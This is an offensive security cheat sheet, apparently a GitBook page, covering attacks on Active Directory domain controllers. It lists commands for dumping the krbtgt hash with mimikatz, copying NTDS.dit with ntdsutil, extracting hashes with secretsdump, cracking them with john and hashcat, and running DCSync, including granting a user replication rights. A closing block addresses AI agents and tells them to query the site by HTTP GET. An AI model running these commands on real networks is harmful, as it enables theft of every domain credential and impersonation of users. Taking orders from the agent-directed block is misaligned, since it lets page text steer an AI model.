# Domain Controller specific

## TGT Dump

dump the hash used by the domain controller to sign Kerberos tickets. This allows an attacker to create custom tickets and impersonate other users or gain access to different services/hosts

```
lsadump::dcsync /user:krbtgt
sekurlsa::krbtgt
lsadump::lsa /inject /name:krbtgt
```

## NTDS Dump

NTDS is an encrypted database containing information about the structure and elements of the AD.

In order to dump the stored hashes we need to extract the following files.

```
C:\Windows\NTDS\ntds.dit
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
```

To dump the required files use the following command in PowerShell

```
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full <dump folder>' q q"
```

Extract the hashes

```
secretsdump.py -security <security file> -system <system file> -ntds <path to ntds.dit> LOCAL
```

Crack the hashes. In order to obtain the passwords we need only the NT part of the hash. given an hash with the following structure `AAAA:BBBB` the actual string to bruteforce is the one to the right of the column

```
john -format=NT -wordlist=<wordlist> <hashfile>
hashcat -m 1000 -a 0 --force --show --username <hash> <wordlist> #rows follow the format <user>:<hash>
```

## DC Sync

To execute this attack we need to operate under a user with the `Replicating Directory Changes All` and `Replicating Directory Changes` privileges. By default Local and Domain Administrators own these privileges.

Find users with the required privileges with PowerView

```
Get-ObjectACL -DistinguishedName "dc=<domain>,dc=local" -ResolveGUIDs | ? {($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') }
```

If the current user lacks the required permissions run this command on the DC to add them.

```
Add-ObjectAcl -TargetDistinguishedName "dc=<domain>,dc=local" -PrincipalSamAccountName <user
```

### Run on DC

```
lsadump::dcsync /user:krbtgt                    //Kerberos TGT
lsadump::dcsync /user:<user>                    //get user info 
lsadump::dcsync /domain:htb.local /all /csv     //dump all users
```

### Run remotely

```
secretsdump.py -just-dc  <domain>/<DC user>@<DC IP>      //dump NTDS
secretsdump.py -just-dc-ntlm <domain>/<DC user>@<DC IP>  //dump TGT
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security-notes.gitbook.io/security-notes/active-directory/local-credentials/domain-controller-specific.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.